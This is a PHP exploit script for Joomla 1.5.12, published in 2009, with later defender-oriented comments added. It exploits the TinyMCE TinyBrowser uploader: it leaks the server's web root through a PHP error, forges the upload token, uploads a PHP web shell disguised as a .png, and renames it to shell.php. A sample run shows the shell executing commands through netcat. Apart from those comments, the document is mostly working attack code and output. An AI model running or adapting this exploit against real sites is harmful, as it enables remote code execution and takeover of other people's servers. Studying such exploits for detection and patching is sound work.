
# Title : Joomla 1.5.12 RCE via TinyMCE upload vulnerability
# Published : 2009-11-19
# Author : daath


<?php

/**
 ** Joomla 1.5.12 Remote Code Execution via TinyMCE upload vulnerability
 **
 ** Tested against :
 ** - Joomla 1.5.12 / Ubuntu 8.10 / Apache 2.2.9
 ** - Joomla 1.5.12 / Windows XP SP2 / Apache 2.2.12
 **
 **  Luca "daath" De Fulgentis - daath [at] nibblesec.org
 **  http://blog.nibblesec.org
 **
 **/

/*
daath@shaytan:~$ php pwnoomla.php localhost /joomla

 [-] Joomla 1.5.12 RCE via TinyMCE upload vulnerability [-]

 [#] Attacking localhost:80/joomla/
 [+] Web root pathname is : /var/www/
 [+] Magic token is a8de65e217ed779dbda80eb04502a2da
 [#] Creating remote directory ... DONE
 [#] Uploading image ... DONE
 [#] Renaming image's extension (takes a while) ... PWNED!
 [+] Here is the php shell : /joomla/images/stories/i208661849/shell.php

daath@shaytan:~$ echo -e "GET /joomla/images/stories/i208661849/shell.php?cmd=ls%20-al%20shell.php HTTP/1.0nn" | nc localhost 80
HTTP/1.1 200 OK
Date: Mon, 28 Sep 2009 10:39:43 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

-rw-r--r-- 1 www-data www-data 54 Sep 28 12:39 shell.php
daath@shaytan:~$ 
*/


 /*
  * Defender's reading of what this script does, step by step:
  *  1. request the TinyBrowser file manager bundled with Joomla's TinyMCE editor;
  *     a reply containing "Restricted access" is treated as "not vulnerable"
  *     (presumably the access check present in fixed builds — TODO confirm);
  *  2. recover the absolute web root from a PHP error message (get_webroot_pathname);
  *  3. derive the upload "obfuscate" token as md5(webroot . constant string);
  *  4. create a directory, upload a .png whose body is PHP, rename it to shell.php.
  * Indicators worth alerting on: direct requests to the tinybrowser plugin path
  * below, POSTs to upload_file.php / edit.php carrying an obfuscate parameter,
  * and new .php files appearing under images/stories/.
  */
 $host = "localhost";
 $port = "80";
 $install_path = "/";

 // Endpoints of the TinyBrowser file manager under the TinyMCE editor plugin.
 $path    = "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser";
 $dir     = "/tinybrowser.php?type=image&folder=";
 $upload  = "/upload_file.php";
 // NOTE(review): unused — the rename request further down builds its own edit.php URL.
 $rename  = "/edit.php?type=file&folder=";

 /*
  * PHP shell
  * Minimal command-execution payload; a file with this content under
  * images/stories/ is the on-disk compromise indicator to hunt for.
  */
 $php_shell = "<?php if(isset($_GET["cmd"])) system($_GET["cmd"]); ?>";

 echo "n [-] Joomla 1.5.12 RCE via TinyMCE upload vulnerability [-]nn";

 // Usage: host is required, the Joomla install path is optional (defaults to "/").
 if($argc < 2) {
  echo " Usage: php {$argv[0]} host joomla_install_pathn";
  echo " Example : php {$argv[0]} localhost /joomla/ nn";
  exit(1);
 }

 $host = $argv[1];

 // Normalise the install path to carry a leading and a trailing slash.
 if($argc == 3) {
  $install_path = $argv[2][0] == "/" ? $argv[2] : "/".$argv[2];
  $install_path = $argv[2][strlen($install_path)-1] == "/" ? $install_path : $install_path."/";
 }

 echo " [#] Attacking {$host}:{$port}{$install_path}n";

 // Vulnerability check: the only signal used is the absence of "Restricted access"
 // in the reply to an unauthenticated request for tinybrowser.php.
 $resp = HTTPRequest("GET {$install_path}/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php HTTP/1.0rnrn");
 if(strstr($resp, "Restricted access")) {
  die(" [-] Joomla is NOT vulnerable, exiting.nn");
 }

 // Full-path disclosure is a hard dependency: without the web root the token
 // below cannot be computed and the script stops here.
 $webroot = get_webroot_pathname();
 if($webroot == "") {
  die(" [-] Web root pathname NOT FOUND, exiting.nn");
 }
 
 echo " [+] Web root pathname is : {$webroot}n";

 // The upload endpoint's "obfuscate" value is derived only from the web root and
 // a constant string, so the path leak alone is enough to reproduce it.
 $seed = md5($webroot . "s0merand0mjunk!!!111");
 echo " [+] Magic token is {$seed}n";

 // Step 1: create a working directory via the folder parameter of tinybrowser.php.
 // Success is detected by the "directory has been successfully created" text.
 $my_dir = "i" . rand();
 echo " [#] Creating remote directory ... ";
 $resp = HTTPRequest("GET {$install_path}{$path}{$dir}/{$my_dir} HTTP/1.0rnrn");

 if(!strstr($resp, "directory has been successfully created")) {
  die("FAILEDn [-] Error - creating directory, exiting.nn");
 }
 echo "DONEn";

 // Step 2: multipart upload of a ".png" whose body is the PHP payload.
 // The server apparently accepts on file-name extension alone — TODO confirm
 // against the TinyBrowser source; content inspection would block this step.
 $my_shell = md5(time());
 echo " [#] Uploading image ... ";

 $data  = "--1234567rn";
 $data .= "Content-Disposition: form-data; name="Filedata"; filename="{$my_shell}.png"rnrn";
 $data .= "{$php_shell}rn";
 $data .= "--1234567--rn";

 // obfuscate= carries the forged token; folder= points into images/stories.
 $req  = "POST {$install_path}{$path}{$upload}" . "?obfuscate={$seed}&type=file&folder={$install_path}images/stories/{$my_dir} HTTP/1.1rn";
 $req .= "Host: {$host}rn";
 $req .= "Content-Length: ".strlen($data)."rn";
 $req .= "Content-Type: multipart/form-data; boundary=1234567rn";
 $req .= "Connection: closernrn";
 $req .= $data; 

 $resp = HTTPRequest($req);

 if (!strstr($resp,"File Upload Success")) {
  die("FAILEDn [-] Error - image uploading, exiting.nn");
 }
 echo "DONEn";

 // Step 3: rename the uploaded file's extension to "php" through edit.php.
 // This is the step that turns an image into executable code; refusing renames
 // to executable extensions, or serving uploads from a non-executing location,
 // neutralises it. The trailing "_" on actionfile is not explained here — verify.
 echo " [#] Renaming image's extension (takes a while) ... ";

 $data  = "actionfile%5B0%5D={$my_shell}.png_&renameext%5B0%5D=php&renamefile%5B0%5D=shell.&sortby=name";
 $data .= "&sorttype=asc&find=&showpage=0&action=rename&commit=rnrn";

 $req  = "POST {$install_path}{$path}/edit.php?type=image&folder={$my_dir}%2F HTTP/1.1n";
 $req .= "Host: {$host}rn";
 $req .= "Content-Type: application/x-www-form-urlencodedrn";
 $req .= "Content-Length: " . strlen($data) . "rnrn";
 $req .= $data;

 $resp = HTTPRequest($req);

 if(!strstr($resp, "1 files have been successfully renamed")) {
  die("FAILEDn [-] Error - image's extension renaming, exiting.n");
 }
 echo "PWNED!n";

 // Final location of the dropped file; the functions below are hoisted, so
 // exiting before their definitions is fine.
 echo " [+] Here is the php shell : {$install_path}images/stories/{$my_dir}/shell.phpnn";
 exit;

 /**
  * Recovers the server's absolute web root by provoking a PHP error message.
  *
  * Requests a library file directly; the reply is expected to contain a PHP
  * error of the form "... in <b>/abs/path/.../libraries/..." (full path
  * disclosure). The text between "in <b>" and "libraries" is taken as the
  * install directory, the install_path component is stripped, and separators
  * are normalised to "/".
  *
  * Returns "" when either marker is missing — e.g. when the server does not
  * render error text to the client — which makes the caller abort.
  */
 function get_webroot_pathname() {

  global $install_path;

  // Direct request to a library file; the reply apparently carries a PHP error
  // that includes the absolute path — this is the information leak being used.
  $resp = HTTPRequest("GET {$install_path}/libraries/joomla/utilities/compat/php50x.php HTTP/1.rnrn");

  $pos1 = strpos($resp, "in <b>");
  $pos2 = strpos($resp, "libraries");

  if($pos1 === false || $pos2 === false)
   return "";

  $init = $pos1 +strlen("in <b>");

  // Everything between the two markers: "<webroot>/<install dir>/".
  $str = substr($resp, $init, $pos2-$init);

  // Strip the Joomla install directory so only the web root remains.
  if($install_path != "/") {

   $install_path2 = str_replace("/", "", $install_path);

   $pos1 = strrpos($str, $install_path2);

   if($pos1 === false)
    return "";

   $str = substr($str, 0, $pos1-1);
  }

  // Drop a trailing backslash (presumably Windows paths — see tested platforms).
  if($str[strlen($str)-1] == "\")
   $str = substr($str, 0, $pos-1);

  // Ensure a trailing "/" on Unix-style paths.
  if(strstr($str, "/") && $str[strlen($str)-1] != "/")
   $str = $str . "/";

  // Normalise Windows separators to "/".
  $pathname = str_replace("\", "/", $str);
  return $pathname;
 }

 /**
  * Sends a raw HTTP request to the global $host:$port and returns the whole
  * reply (status line, headers and body) as one string.
  *
  * Plain TCP only, no TLS. Connect timeout is 10 s; fsockopen warnings are
  * suppressed with @ and the script exits if the connection fails. The reply
  * is read until EOF, so this relies on the server closing the connection.
  */
 function HTTPRequest($req) {

  global $host, $port;

  $s = @fsockopen($host, $port, $errno, $errstr, 10);
  if(!$s) {
   die("n [-] Error in connection, exiting.nn");
  }

  // Request is written verbatim; the caller is responsible for headers and framing.
  fputs($s, $req);
  $resp = "";
  while(!feof($s)) {
   $resp .= fgets($s);
  }
  fclose($s);

  return $resp;
 }
?>